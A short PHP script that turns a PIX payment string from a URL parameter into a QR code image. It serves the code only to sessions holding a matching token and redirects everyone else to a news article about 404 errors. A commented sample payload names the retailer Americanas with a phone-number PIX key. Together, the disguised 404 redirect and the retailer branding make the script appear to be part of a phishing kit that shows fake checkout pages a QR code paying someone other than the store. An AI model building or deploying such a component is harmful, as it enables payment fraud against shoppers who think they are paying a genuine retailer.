<?php


if(isset($_GET['COMON/']) && ISSET($_GET["copia"])){
	$p = $_GET['COMON/'];
	
	if(isset($_SESSION[$p]) && $_SESSION[$p] == $p){ 


require_once ("./phpqrcode/qrlib.php"); 

$pix = $_GET["copia"];

//$pix = "00020126360014BR.GOV.BCB.PIX0114+5564999993331520400005303986540510.005802BR5910AMERICANAS6009SAO PAULO62140510AMERICANAS63043FE0";

ob_start();
QRCode::png($pix, null,'M',5);
$imageString = base64_encode( ob_get_contents() );

ob_end_clean();




//diz ao servidor que isto é do tipo mime image/gif
header("Content-type:image/png");
// cria uma imagem com 200 de largura e 200 de altura

echo  base64_decode($imageString);




	}else{
	
		Header( "Location: https://www.techtudo.com.br/listas/2018/07/o-que-e-erro-404-veja-significado-dos-problemas-mais-comuns.ghtml" );
}
}else{
	
		Header( "Location: https://www.techtudo.com.br/listas/2018/07/o-que-e-erro-404-veja-significado-dos-problemas-mais-comuns.ghtml" );
}











?>
<img src="?p=p" />